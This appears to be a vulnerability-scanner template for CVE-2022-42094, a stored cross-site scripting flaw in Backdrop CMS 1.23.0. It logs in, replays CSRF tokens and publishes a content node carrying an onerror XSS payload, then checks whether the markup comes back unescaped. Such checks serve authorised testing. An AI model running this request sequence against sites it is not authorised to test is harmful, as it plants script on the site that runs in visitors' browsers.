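id: CVE-2022-42094

# Authenticated, stored-XSS check for Backdrop CMS 1.23.0 (CWE-79).
#
# Operational notes for whoever runs this:
#   - The template needs valid credentials supplied as template variables
#     ({{username}}, {{password}}); the account must be allowed to create
#     'Card' content and to use the 'full_html' text format (the POST below
#     submits body[und][0][format]=full_html). CVSS PR:H reflects that.
#   - It is NOT read-only: request 4 creates and PUBLISHES (status=1) a
#     card node containing the probe markup on the target. Only run against
#     systems you are authorised to test, and delete the created node
#     afterwards.
#   - The probe string in body[und][0][value] and the first matcher word are
#     a benign, reflection-only payload (alert(document.domain)); the match
#     is on the literal, unescaped markup, so an HTML-escaped reflection
#     (&lt;img ...) correctly does not match.
#   - form_build_id / form_token are anti-CSRF tokens, so they are pulled
#     from the preceding GET via the internal extractors below and replayed;
#     cookie-reuse keeps the login session across the four requests.

info:
  name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
  reference:
    - https://github.com/backdrop/backdrop/releases/tag/1.23.0
    - https://github.com/bypazs/CVE-2022-42094
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42094
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-42094
    cwe-id: CWE-79
  metadata:
    max-request: 4
    verified: true
  tags: cve,cve2022,xss,cms,backdrop,authenticated

http:
  - raw:
      # 1. Fetch the login form to obtain its form_build_id (-> form_id_1).
      - |
        GET /?q=user/login HTTP/1.1
        Host: {{Hostname}}

      # 2. Authenticate; the session cookie is reused by the later requests.
      - |
        POST /?q=user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in

      # 3. Fetch the 'Card' node form to obtain form_build_id (-> form_id_2),
      #    form_token and the pre-filled author name (-> name).
      - |
        GET /?q=node/add/card HTTP/1.1
        Host: {{Hostname}}

      # 4. Create a published card whose body carries the probe markup in the
      #    full_html format. With host-redirects enabled the post-save
      #    redirect to the new node is followed, and that page is where the
      #    stored markup is expected to be reflected.
      - |
        POST /?q=node/add/card HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY

        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="title"

        {{randstr}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="field_image[und][0][fid]"

        0
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="field_image[und][0][display]"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="changed"


        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_build_id"

        {{form_id_2}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_token"

        {{form_token}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="form_id"

        card_node_form
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="body[und][0][value]"

        <img src=x onerror=alert(document.domain)>
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="body[und][0][format]"

        full_html
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="status"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="name"

        {{name}}
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="date[date]"

        2023-04-13
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="date[time]"

        21:49:36
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="path[auto]"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="comment"

        1
        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="additional_settings__active_tab"


        ------WebKitFormBoundaryWEcZgRB4detkrGaY
        Content-Disposition: form-data; name="op"

        Save
        ------WebKitFormBoundaryWEcZgRB4detkrGaY--

    cookie-reuse: true
    host-redirects: true

    # Positive only when the exact, unescaped probe markup is present in a
    # 200 page that also identifies itself as Backdrop CMS.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'Backdrop CMS'
        condition: and

      - type: status
        status:
          - 200

    # All extractors are internal (feed later requests, not reported).
    # Captures are non-greedy so that further attributes on the same input
    # tag cannot bleed into the token value.
    extractors:
      - type: regex
        name: form_id_1
        group: 1
        regex:
          - 'name="form_build_id" value="(.*?)"'
        internal: true

      - type: regex
        name: name
        group: 1
        regex:
          - 'name="name" value="(.*?)"'
        internal: true

      # Same source field as form_id_1; re-extracted after the node/add/card
      # GET so that request 4 replays the token for that form, not the login.
      - type: regex
        name: form_id_2
        group: 1
        regex:
          - 'name="form_build_id" value="(.*?)"'
        internal: true

      - type: regex
        name: form_token
        group: 1
        regex:
          - 'name="form_token" value="(.*?)"'
        internal: true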